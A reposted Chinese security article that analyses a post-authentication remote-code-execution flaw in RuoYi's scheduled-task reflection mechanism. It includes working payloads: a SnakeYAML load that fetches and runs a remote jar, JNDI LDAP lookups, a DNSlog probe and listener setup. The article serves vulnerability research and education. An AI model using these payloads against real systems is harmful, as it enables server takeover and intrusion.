若依最新版后台RCE

admin
admin
admin
139701
文章
114
评论
2024年4月22日07:12:27评论146 views字数 2341阅读7分48秒阅读模式

若依定时任务的实现是通过反射调来调用目标类,目标类的类名可控导致rce。在版本迭代中增加了黑白名单来防御,但仍然可绕过!

前言

关于若依漏洞或者是审计的文章网上挺多的,本来就只是想写一下最新版4.7.8的RCE。因为之前没接触过若依就打算看看定时任务实现的原理以及历史的漏洞,但是在查阅资料的时候,发现了一些文章给的poc有问题,比如作者写的是<4.7.2时,给的是org.springframework.jndi.JndiLocatorDelegate.lookup('r'm'i://ip:端口/refObj'),大概作者的目的是想说明可以通过若依对字符串的处理的一些问题(参数中的'会替换为空)绕过对rmi的过滤,但是却没有考虑到org.springframework.jndi在4.7.1版本中已经加入了黑名单。作者也只是给出了poc,并没有复现的过程!

计划任务实现原理

从官方文档可以看出可以通过两种方法调用目标类:

  • Bean调用示例:ryTask.ryParams('ry')

  • Class类调用示例:com.ruoyi.quartz.task.RyTask.ryParams('ry')

接下来咱调试一下,看看具体是如何实现的这个功能的

首先直接在测试类下个断点,看看调用

若依最新版后台RCE

通过系统默认的任务1来执行这个测试类

若依最新版后台RCE

若依最新版后台RCE
在调用过程中,会发现在com.ruoyi.quartz.util.JobInvokeUtil类中存在两个名为invokeMethod的方法,并前后各调用了一次

若依最新版后台RCE

在第一个invokeMethod方法中对调用目标字符串的类型进行判断,判断是Bean还是Class。然后调用第二个invokeMethod方法

  • bean就通过getBean()直接获取bean的实例

  • 类名就通过反射获取类的实例

if (!isValidClassName(beanName)){  
    Object bean = SpringUtils.getBean(beanName);  
    invokeMethod(bean, methodName, methodParams);  
}  
else  
{  
    Object bean = Class.forName(beanName).newInstance();  
    invokeMethod(bean, methodName, methodParams);  
}

第二个invokeMethod这个方法通过反射来加载测试类

if (StringUtils.isNotNull(methodParams) && methodParams.size() > 0){
    Method method = bean.getClass().getDeclaredMethod(methodName, getMethodParamsType(methodParams));
    method.invoke(bean, getMethodParamsValue(methodParams));
}

这大概就是定时任务加载类的逻辑

漏洞成因

接着我们新增一个定时任务,看看在创建的过程中对调用目标字符串做了哪些处理

抓包可以看到直接调用了/monitor/job/add这个接口

若依最新版后台RCE

可以看到就只是判断了一下,目标字符串是否包含rmi://,这就导致导致攻击者可以调用任意类、方法及参数触发反射执行命令。

若依最新版后台RCE

若依最新版后台RCE

由于反射时所需要的:类、方法、参数都是我们可控的,所以我们只需传入一个能够执行命令的类方法就能达到getshell的目的,该类只需要满足如下几点要求即可:

  • 具有public类型的无参构造方法

  • 自身具有public类型且可以执行命令的方法

4.6.2

因为目前对调用目标字符串限制不多,so直接拿网上公开的poc打吧!

  • 使用Yaml.load()来打SnakeYAML反序列化

  • JNDI注入

SnakeYAML反序列化

探测SnakeYAMLpoc:

String poc = "{!!java.net.URL ["http://5dsff0.dnslog.cn/"]: 1}";

利用SPI机制-基于ScriptEngineManager利用链来执行命令,直接使用这个师傅写好的脚本:https://github.com/artsploit/yaml-payload

1)把这块修改成要执行的命令

若依最新版后台RCE

2)把项目生成jar包

javac src/artsploit/AwesomeScriptEngineFactory.java    //编译java文件
jar -cvf yaml-payload.jar -C src/ .             //打包成jar包

3)在yaml-payload.jar根目录下起一个web服务

python -m http.server 9999

4)在计划任务添加payload,执行

org.yaml.snakeyaml.Yaml.load('!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ["http://127.0.0.1:9999/yaml-payload.jar"]]]]')

若依最新版后台RCE

JNDI注入

使用yakit起一个返连服务

若依最新版后台RCE

poc:

javax.naming.InitialContext.lookup('ldap://127.0.0.1:8085/calc')

nc监听端口

若依最新版后台RCE

若依最新版后台RCE

文章来源: https://forum.butian.net/share/2796文章作者:Yu9如有侵权请联系我们,我们会进行删除并致歉

声明:⽂中所涉及的技术、思路和⼯具仅供以安全为⽬的的学习交流使⽤,任何⼈不得将其⽤于⾮法⽤途以及盈利等⽬的,否则后果⾃⾏承担。

原文始发于微信公众号(白帽子左一):若依最新版后台RCE

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年4月22日07:12:27
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   若依最新版后台RCEhttps://cn-sec.com/archives/2577565.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息